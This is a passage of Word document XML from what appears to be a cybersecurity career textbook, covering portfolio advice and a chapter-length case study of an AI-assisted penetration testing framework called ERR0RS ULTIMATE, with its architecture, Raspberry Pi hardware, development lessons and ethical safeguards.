        <w:t xml:space="preserve">TryHackMe: More beginner-friendly with guided learning paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PentesterLab: Strong focus on web application security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnHub: Download vulnerable VMs to run locally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IppSec YouTube: Walkthroughs of retired HTB machines (incredible free resource).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">12.4 Building Your Portfolio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Employers want to see evidence of skill, not just a list of certifications. Build a portfolio that demonstrates real capability:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub: Put your tools, scripts, and projects on GitHub with good README files. (Eros: github.com/Gnosisone)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write-ups: Document your approach to CTF challenges and lab exercises. Post on GitHub or a blog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open source contributions: Contributing to security tools is highly visible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom tools: Building tools (like ERR0RS ULTIMATE) demonstrates advanced skill.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Video content: Recording your methodology is a powerful portfolio piece.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2E7D32" w:sz="4"/>
              <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:right w:val="single" w:color="2E7D32" w:sz="4"/>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PRO TIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:left w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E7D32" w:sz="4"/>
              <w:right w:val="single" w:color="2E7D32" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8F5E9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The ERR0RS ULTIMATE framework you're building is itself a portfolio piece. A documented, open-source AI-powered penetration testing framework will stand out in any job application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 13: The ERR0RS Project - A Case Study in Applied Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This chapter documents the ERR0RS ULTIMATE project as a real-world example of applied security engineering, hardware integration, and software development. It illustrates how all the concepts in this book come together in a practical project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">13.1 Project Vision</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ERR0RS ULTIMATE is an AI-powered penetration testing framework designed to run on Kali Linux and Parrot OS. The vision: create what Clippy was to Microsoft Office, but for offensive security - a fully interactive, intelligent assistant that guides security professionals through the penetration testing process from reconnaissance through reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Core requirements:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fully local: No data leaves the machine. Client privacy is paramount.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AI-powered: Natural language interface using local LLMs (Ollama) or API-based LLMs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tool integration: 120+ Kali tools auto-integrated and orchestrated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Educational: Every action explains what it's doing and why</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ethical: Built-in guardrails against unauthorized use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">13.2 Software Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ERR0RS ULTIMATE is built on a Python/FastAPI backend with a modular agent architecture:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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5000"/>
      </w:tblGrid>
      <w:tr>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5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Layer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FastAPI + Uvicorn</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RESTful API, async request handling, Swagger documentation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AI Engine</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Anthropic Claude API / Ollama (local)</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Natural language processing, tool selection, reporting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Tool Adapter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 subprocess + async</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Universal interface to 120+ Kali/Parrot tools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Report Generator</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Jinja2 + WeasyPrint</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HTML/PDF report generation with findings and remediation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 Layer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JWT + passlib</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authentication and session management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Config System</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YAML + python-dotenv</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Environment-specific configuration management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">13.3 Hardware Platform (ERR0RS Hardware Stack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For maximum portability, ERR0RS is also being built on Raspberry Pi 5 hardware:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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486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3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Spec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Raspberry Pi 5</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16GB RAM, BCM2712 quad-core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Main compute platform</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AI HAT+ 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Hailo-10H, 40 TOPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Local AI model inference (LLMs, pattern recognition)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NVMe HAT (X1004)</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Dual M.2 2280 slots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 storage for OS, tools, and captured data</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PCIe Splitter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Waveshare 2-CH PCIe HAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Connects both AI HAT and NVMe to single Pi 5 PCIe port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WiFi Adapter</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Alfa with injection support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Monitor mode for wireless testing</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PiSquare RP2040+ESP12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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WiFi GPIO bridge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Wireless communication with satellite modules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Display</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 touch HDMI</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Local interface and live dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">13.4 Key Development Lessons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Real projects teach things textbooks don't. Here are the key lessons from building ERR0RS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PCIe passthrough is not trivial: The Raspberry Pi 5 has one PCIe FFC connector. Splitting it requires a hardware PCIe switch - and not all HATs support passthrough. Always verify before purchasing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OS compatibility matters more than you think: The Hailo-10H requires Debian Trixie (not Bookworm). Installing on the wrong OS version wastes days of debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Package manager conflicts are real: Mixing Kali, Parrot, and Raspberry Pi OS repos without APT pinning will break your system. Always configure pinning before adding repos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Entry points in setup.py must match your actual package structure: A wrong entry point causes silent failures that are hard to debug. Always verify your package hierarchy first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Debian packaging is not just zipping files: Understanding control files, postinst scripts, and dependencies is essential for distributable packages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">13.5 Ethical Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ERR0RS includes an ethical framework as a core component, not an afterthought:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization check: The tool prompts for confirmation that the tester has authorization before running any aggressive scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope enforcement: Target lists are checked against the defined scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Activity logging: All tool executions are logged with timestamps for accountability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Educational mode: Every tool explains what it does and what the output means.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No automated exploitation: The tool assists decision-making but requires human confirmation before running exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
